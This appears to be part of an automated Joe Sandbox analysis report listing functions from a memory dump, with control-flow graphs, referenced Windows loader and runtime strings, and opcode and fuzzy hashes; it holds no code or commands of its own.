                control_flow_graph 1053 2094510f-20945141 1054 2098b9ab-2098b9b0 1053->1054 1055 20945147-2094515e call 20948bd1 1053->1055 1058 2098b9b7-2098b9c1 1054->1058 1055->1058 1061 20945164-2094517b call 20948bd1 1055->1061 1059 2098b9c3-2098b9d0 GetPEB call 20933bc0 1058->1059 1060 2098b9d5 1058->1060 1059->1060 1064 2098b9dd 1060->1064 1066 2094517d-20945195 GetPEB call 20933bc0 1061->1066 1067 20945198-209451af call 20948bd1 1061->1067 1069 2098b9e5-2098b9ef 1064->1069 1066->1067 1074 209451b5-209451c0 1067->1074 1075 2094526f-20945286 call 20948bd1 1067->1075 1073 2094544b-2094544f 1069->1073 1076 20945455-2094545a 1073->1076 1077 2098badc-2098baee GetPEB call 20933bc0 1073->1077 1074->1064 1078 209451c6-209451e1 GetPEB call 20935d90 1074->1078 1089 2094528c-20945297 1075->1089 1090 20945348-2094535f call 20948bd1 1075->1090 1080 20945460-20945496 1076->1080 1081 2098baf3-2098baf5 1076->1081 1077->1081 1078->1069 1093 209451e7-2094520a call 209688c0 call 2096a8b0 1078->1093 1081->1080 1083 2098bafb-2098bb17 GetPEB call 20933bc0 1081->1083 1083->1080 1094 2098ba41-2098ba43 1089->1094 1095 2094529d-209452b8 GetPEB call 20935d90 1089->1095 1101 20945365-20945370 1090->1101 1102 20945446 1090->1102 1115 20945210-20945218 1093->1115 1116 2098b9f4 1093->1116 1100 2098ba4b-2098ba53 1094->1100 1095->1100 1104 209452be-209452e3 call 209688c0 call 2096a8b0 1095->1104 1105 20945449 1100->1105 1106 20945376-20945391 GetPEB call 20935d90 1101->1106 1107 2098baa5-2098baa7 1101->1107 1102->1105 1130 2098ba58 1104->1130 1131 209452e9-209452f1 1104->1131 1105->1073 1113 2098baaf-2098bab7 1106->1113 1119 20945397-209453b8 call 209688c0 call 2096a8b0 1106->1119 1107->1113 1113->1102 1120 20945239-2094523b 1115->1120 1121 2094521a-20945233 call 20965050 call 209456e0 1115->1121 1118 2098b9f7-2098ba18 call 20965050 call 209456e0 1116->1118 1158 2098ba1a 1118->1158 1159 2098ba1b-2098ba2e call 2096a8b0 1118->1159 1151 209453fc-20945404 1119->1151 1152 209453ba 1119->1152 1122 20945255-2094525a 1120->1122 1123 2094523d-20945252 GetPEB call 20933bc0 1120->1123 1121->1120 1155 2098ba3b-2098ba3c 1121->1155 1132 2094526c 1122->1132 1133 2094525c-20945267 GetPEB call 20933bc0 1122->1133 1123->1122 1138 2098ba5b-2098ba7c call 20965050 call 209456e0 1130->1138 1139 20945312-20945314 1131->1139 1140 209452f3-2094530c call 20965050 call 209456e0 1131->1140 1132->1075 1133->1132 1181 2098ba7e 1138->1181 1182 2098ba7f-2098ba92 call 2096a8b0 1138->1182 1149 20945316-2094532b GetPEB call 20933bc0 1139->1149 1150 2094532e-20945333 1139->1150 1140->1139 1183 2098ba9f-2098baa0 1140->1183 1149->1150 1153 20945345 1150->1153 1154 20945335-20945340 GetPEB call 20933bc0 1150->1154 1166 20945406-2094541f call 20965050 call 209456e0 1151->1166 1167 20945422-20945424 1151->1167 1162 209453bd-209453de call 20965050 call 209456e0 1152->1162 1153->1090 1154->1153 1155->1120 1158->1159 1159->1118 1176 2098ba30-2098ba33 1159->1176 1195 209453e0 1162->1195 1196 209453e1-209453f4 call 2096a8b0 1162->1196 1166->1167 1194 20945421 1166->1194 1171 2098babc-2098bad4 GetPEB call 20933bc0 1167->1171 1172 2094542a-20945431 1167->1172 1171->1077 1178 20945443 1172->1178 1179 20945433-2094543e GetPEB call 20933bc0 1172->1179 1176->1155 1178->1102 1179->1178 1181->1182 1182->1138 1193 2098ba94-2098ba97 1182->1193 1183->1139 1193->1183 1194->1167 1195->1196 1196->1162 1199 209453f6-209453f9 1196->1199 1199->1151
                Strings
                • Kernel-MUI-Number-Allowed, xrefs: 20945167
                • WindowsExcludedProcs, xrefs: 2094514A
                • Kernel-MUI-Language-SKU, xrefs: 2094534B
                • Kernel-MUI-Language-Allowed, xrefs: 2094519B
                • Kernel-MUI-Language-Disallowed, xrefs: 20945272
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                • API String ID: 0-258546922
                • Opcode ID: 92412f591a0c71f28eadf98ebad8411398e35a6e781aeb1655250cb64e99b58d
                • Instruction ID: c9e7cc27e27e156756ff484647ce2e0712015f1f1c027fcd2cf69c2e0ac8f3a9
                • Opcode Fuzzy Hash: 92412f591a0c71f28eadf98ebad8411398e35a6e781aeb1655250cb64e99b58d
                • Instruction Fuzzy Hash: 69F12672D01219EFCB15CFE8C981B9EBBFCEF58650F54406AE616A7211E6749E01CBA0
                Function 2092A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                • API String ID: 0-379654539
                • Opcode ID: c3a8b4e31b6a3df108673dcd4763059bea619564a51d46863a22df196ba34531
                • Instruction ID: b51997f974ae44c2b74c3899d34e7077645cf550ab8034002b3b07560c8572a5
                • Opcode Fuzzy Hash: c3a8b4e31b6a3df108673dcd4763059bea619564a51d46863a22df196ba34531
                • Instruction Fuzzy Hash: 48C1AC72108B82CFE315CF94D540B5AB7E4FF85704F0049AAF9968B2A5E378CE45CB56
                Function 209190F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                • API String ID: 0-1391187441
                • Opcode ID: 3addc773f606fb827f8ec500c39c41c29e7e0c5f25064f09eee0888c707496ed
                • Instruction ID: bca23d1b9fb692b8e9c217dc085886bdea62e0cb3e2cac3a0f243142a70b332e
                • Opcode Fuzzy Hash: 3addc773f606fb827f8ec500c39c41c29e7e0c5f25064f09eee0888c707496ed
                • Instruction Fuzzy Hash: F731A372A0010DFFCB11CBD8C888F9AB7B9FB45764F2440A5F516AB2A1D734ED81CA61
                Function 20927072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID:
                • API String ID: 3446177414-0
                • Opcode ID: 360e9aaad31b5011124dc5ba1dcec650ddfea73c09422740e000e495fc45bf75
                • Instruction ID: 838a4efe2bf6e9e8c4f2005457d9993b0018d02ebfea0a614e90181b80c3e54a
                • Opcode Fuzzy Hash: 360e9aaad31b5011124dc5ba1dcec650ddfea73c09422740e000e495fc45bf75
                • Instruction Fuzzy Hash: 5651E130A44A06EFDB05CBE4D854BAEF7B8BF54315F2041AAE503A7290DB799A15DF80
                Function 2091A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: FilterFullPath$UseFilter$\??\
                • API String ID: 0-2779062949
                • Opcode ID: 67de3906875b6fbe562b08ac5977bf7f736b3bb2e6c4f59b7dec0f4c11a174b3
                • Instruction ID: 94eaa5b8dbfa3a6f69777badff70e6b80f2c9fe7b5e8a768592cadfd8afc1e7d
                • Opcode Fuzzy Hash: 67de3906875b6fbe562b08ac5977bf7f736b3bb2e6c4f59b7dec0f4c11a174b3
                • Instruction Fuzzy Hash: 5AA170B29016299BDB21DFA4CC88BDAB7B8EF44714F1045EAE90AA7250D7359FC4CF50
                Function 209FB2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                Download Yara Rule
                Strings
                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 209FB3AA
                • TargetNtPath, xrefs: 209FB3AF
                • GlobalizationUserSettings, xrefs: 209FB3B4
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                • API String ID: 0-505981995
                • Opcode ID: 121c09e080f3a6ee0b0d1685fac0e63ca0f190c303d7b73aacbcf26c774e76d8
                • Instruction ID: 0e8d96347c4480617abb38b21e0ab97ad0baa6d54f62e09e64fe35e9b598c1f9
                • Opcode Fuzzy Hash: 121c09e080f3a6ee0b0d1685fac0e63ca0f190c303d7b73aacbcf26c774e76d8
                • Instruction Fuzzy Hash: 30619032D4162DABDB21DF94CC8CF9AB7B8AB14710F4101E5E60AAB250C778DE84CF90
                Function 209532C0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                Download Yara Rule
                Strings
                • RtlCreateActivationContext, xrefs: 20992803
                • SXS: %s() passed the empty activation context data, xrefs: 20992808
                • Actx , xrefs: 209532CC
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                • API String ID: 0-859632880
                • Opcode ID: ce8ae5eaf92858177da8bb1686ee3bab75a15fcc1d8907dc3d83ddf57e2bc004
                • Instruction ID: 6cd448c591bdbb9d610a2759406cb7c3c96f1bb5472dac55cf30c61bd5079c15
                • Opcode Fuzzy Hash: ce8ae5eaf92858177da8bb1686ee3bab75a15fcc1d8907dc3d83ddf57e2bc004
                • Instruction Fuzzy Hash: 2F31F2326002099BDB01CFAAD8D0F967BA8AB44754F5184A9FD06DF285CB74DD09CB90
                Function 209AB214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                Download Yara Rule
                Strings
                • @, xrefs: 209AB2F0
                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 209AB2B2
                • GlobalFlag, xrefs: 209AB30F
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                • API String ID: 0-4192008846
                • Opcode ID: 032d1a9e05e5435d61e1997a156255a64a20581a6550b7c3a6974b72cc87f58f
                • Instruction ID: cebf2e511428bc722be3c62afbcc0df788e0c909a37cb74e1a7575bbd25ec002
                • Opcode Fuzzy Hash: 032d1a9e05e5435d61e1997a156255a64a20581a6550b7c3a6974b72cc87f58f
                • Instruction Fuzzy Hash: C5315AB1A01209AEDF00DFE4DC81BEEBBBCEF54744F4004A9E616A7245DB749E448B90
                Function 20961190 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                Download Yara Rule
                Strings
                • @, xrefs: 209611C5
                • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 2096119B
                • BuildLabEx, xrefs: 2096122F
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                • API String ID: 0-3051831665
                • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                • Instruction ID: 3d4291ed0168c76dc65d0222c11976fe88d3874cac8bf576fd1efbc798fb04c6
                • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                • Instruction Fuzzy Hash: 0131CDB2901619BFCB11CBE5CC41FEEBBBDEB84750F104025F616A72A0E734DA058BA0
                Function 209351C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: @$@
                • API String ID: 0-149943524
                • Opcode ID: 6b40b1d4ddf672f9c2b547d2ab2c49ab08c2bee685d2cc921f6c92c86bb2179a
                • Instruction ID: 6e30886269646a3db17accf83b5137108fcaad934b1375724f7049c1d6c0eb27
                • Opcode Fuzzy Hash: 6b40b1d4ddf672f9c2b547d2ab2c49ab08c2bee685d2cc921f6c92c86bb2179a
                • Instruction Fuzzy Hash: 6C3279705083518BC724CF94C490B6EB7EAEF89744F10896EFA969B290E738DD44DF92
                Function 2092A1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                Download Yara Rule
                Strings
                • RtlpResUltimateFallbackInfo Enter, xrefs: 2092A21B
                • RtlpResUltimateFallbackInfo Exit, xrefs: 2092A229
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                • API String ID: 0-2876891731
                • Opcode ID: 8cce9ca08b190c364089a4040359122609b779f6da2e7dfffbe8ad50d200d0a9
                • Instruction ID: d4db33832439fe924c70da9c50c7c74233b3a4653fb751f24f554672a51514ca
                • Opcode Fuzzy Hash: 8cce9ca08b190c364089a4040359122609b779f6da2e7dfffbe8ad50d200d0a9
                • Instruction Fuzzy Hash: 93419D32600A44DFE701CFE9D590B5A77B9EF85710F2140A5E966DB3A5E23ADD00CB50
                Function 209B314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                • API String ID: 0-118005554
                • Opcode ID: efbeff7c1afa4a0d43b4027c80377d1ee5456e2205ef3e6690989285d583dfa1
                • Instruction ID: cb5bf0649279ba33f40f4b5cf4a4f214d5d30b929b0dd149f0dbc1433effe6b4
                • Opcode Fuzzy Hash: efbeff7c1afa4a0d43b4027c80377d1ee5456e2205ef3e6690989285d583dfa1
                • Instruction Fuzzy Hash: 993104312487409BD311CFE9D881B1AB7E8EF85720F008499FD66CB390EB34D905CB52
                Function 209531BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: .Local\$@
                • API String ID: 0-380025441
                • Opcode ID: e5136b757700b0819cc324c4e3e836ec230baf56eddad38c537535a55f50d501
                • Instruction ID: f82956c6bf953ef8ec92cbf0ebeeafe186ece1ffb43421a432624c23dbdf73ec
                • Opcode Fuzzy Hash: e5136b757700b0819cc324c4e3e836ec230baf56eddad38c537535a55f50d501
                • Instruction Fuzzy Hash: FE31AF71549B05AFC310CFA9C8C1B5BFFE8FB85654F10492EF9A683250D638DE089B92
                Function 20921051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID:
                • API String ID: 3446177414-0
                • Opcode ID: ea945e1cea6eec92a43e59522dfc2fd553a3ed24a8e17158e721feaa94d443b5
                • Instruction ID: 9dc584a2b56f47f071938f00bc1d1d58b32afc513a29d16fb4664e8338b760d5
                • Opcode Fuzzy Hash: ea945e1cea6eec92a43e59522dfc2fd553a3ed24a8e17158e721feaa94d443b5
                • Instruction Fuzzy Hash: 80B101B56097808FD354CF68C490A5AFBF1BB88304F1489AEF99A97362D335E945CF42
                Function 209192AF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID:
                • API String ID: 3446177414-0
                • Opcode ID: b2a0c7ef3b2c4326546f9cefb3a7800debb316b508f53958c41122e22183684d
                • Instruction ID: cacd1c5b06cd4608baa322be0c1f8d0b03976f9ad122f891ba3601268b3f115a
                • Opcode Fuzzy Hash: b2a0c7ef3b2c4326546f9cefb3a7800debb316b508f53958c41122e22183684d
                • Instruction Fuzzy Hash: 9DF0FA32200608BFD331CB98CC05F9BFBFDEF80B00F080558B542830A1C6B0E94ACAA0
                Function 209302F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: #%u
                • API String ID: 0-232158463
                • Opcode ID: d73597a37ae89b9104d7f135808830f6b5aec640ab25aa965a3feea5cbf664c0
                • Instruction ID: e865c0068ac4e2babd8b5d0bb2e943f3ab44b435520fe702a6e58f25f4db73b2
                • Opcode Fuzzy Hash: d73597a37ae89b9104d7f135808830f6b5aec640ab25aa965a3feea5cbf664c0
                • Instruction Fuzzy Hash: FB712971A001499FDB05CFE8D991FAEB7F8AF58704F144065E906E7251EB38ED41CBA0
                Function 209541BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                • Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                • Instruction ID: 6308e9bc65a4d7feb22e81d8d008a2f201a44afa6cda75707b766d91137cb782
                • Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                • Instruction Fuzzy Hash: 26514C71505711AFC321CF95C841B6BBBF8FF48710F00892AFA96976A0E774D914CB91
                Function 2097717A Relevance: .7, Instructions: 705COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 999ee7e2bc374b6d80196e964e83bc2a2e99e6afa9eb2a0cc454eaa42ef003d2
                • Instruction ID: 9f782649afd99028c1b5da9a98c8a15605ec024bbefb9bf9de897db6409ddf4d
                • Opcode Fuzzy Hash: 999ee7e2bc374b6d80196e964e83bc2a2e99e6afa9eb2a0cc454eaa42ef003d2
                • Instruction Fuzzy Hash: 8142A4B2A006158FCB08CF99C490AADF7B6FF88314B14C59DE552AB361D735ED42CB90
                Function 2094B1E0 Relevance: .6, Instructions: 629COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5b9cae3c81254a2c225b1794fe31b81925dac23ec8487b817ebb1ca0971e681f
                • Instruction ID: 0eb7f2433c5c8be06176a4799094c23bcbabd91e25e9da46af0e8b966925e28b
                • Opcode Fuzzy Hash: 5b9cae3c81254a2c225b1794fe31b81925dac23ec8487b817ebb1ca0971e681f
                • Instruction Fuzzy Hash: B0329F76E01219DBCB14CFE8C891BAEBBB5FF94714F140169E906AB391E7399D01CB90
                Function 209282E0 Relevance: .3, Instructions: 281COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8b446115987b3f5791382b4c574ff67aa666a05e516953d7a6e8e39a74165ea1
                • Instruction ID: dfa3bbd62412b484a48bc3f138f928aa4654bc3871bbd4159bc5ef0545273e33
                • Opcode Fuzzy Hash: 8b446115987b3f5791382b4c574ff67aa666a05e516953d7a6e8e39a74165ea1
                • Instruction Fuzzy Hash: A1C155702093418FD360CF55C494BABB7E8BF98304F50496DE99A877A1E774EA08CF92
                Function 209600A5 Relevance: .3, Instructions: 276COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 03a28516e7b7db1911d666131419e18f2033ce0c213bb1ab6fa276fb030988b0
                • Instruction ID: 50f2314f375876c10a901ecf37a0fe99a9712822e79f01b470e9e1fe428320f1
                • Opcode Fuzzy Hash: 03a28516e7b7db1911d666131419e18f2033ce0c213bb1ab6fa276fb030988b0
                • Instruction Fuzzy Hash: 47A1D170B0061A9FD714CFE9C9D1BABB7B9FF84305F504069E91697391EB38A911DB80
                Function 209F4080 Relevance: .3, Instructions: 275COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 716ba1e91bbd51f47e31d24c928412b076aed6d476207816082a361eee44b5ed
                • Instruction ID: b30396c5689f6a8886f4c215b07a4350a68f75bc1609341bcede5498ef79593a
                • Opcode Fuzzy Hash: 716ba1e91bbd51f47e31d24c928412b076aed6d476207816082a361eee44b5ed
                • Instruction Fuzzy Hash: 97A1FA72604605EFC311CFA8C985B5ABBE9FF59704F404968F286DB661C378ED51CB90
